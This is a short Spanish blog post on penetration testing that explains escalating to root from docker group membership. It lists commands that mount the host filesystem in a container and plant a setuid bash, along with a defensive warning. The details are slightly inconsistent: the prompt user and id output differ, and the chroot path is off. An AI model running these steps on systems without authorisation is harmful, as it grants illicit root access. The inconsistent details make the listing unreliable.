~ / blog / pentesting
KALI

Escapa del grupo docker

Si tu usuario está en el grupo docker, técnicamente ya eres root, aunque no lo parezca.

Verifícalo con el comando id. Como los contenedores corren con privilegios del anfitrión, arrancas uno que monte todo el disco del sistema, entras a él, y desde ahí modificas cualquier archivo del anfitrión, por ejemplo dándote un binario con permisos de root.

Estar en el grupo docker debe tratarse como acceso root total. Concédelo con muchísimo cuidado.

# los comandos

www-data@victim:$ idcopiar
uid=1000(dev) groups=1000(dev),998(docker)
www-data@victim:$ docker run -v /:/mnt --rm -it alpine chroot /mnt shcopiar
# cp /bin/bash /mnt/tmp/r && chmod +s /mnt/tmp/rcopiar
www-data@victim:$ /tmp/r -pcopiar
r-5.1# id -> euid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.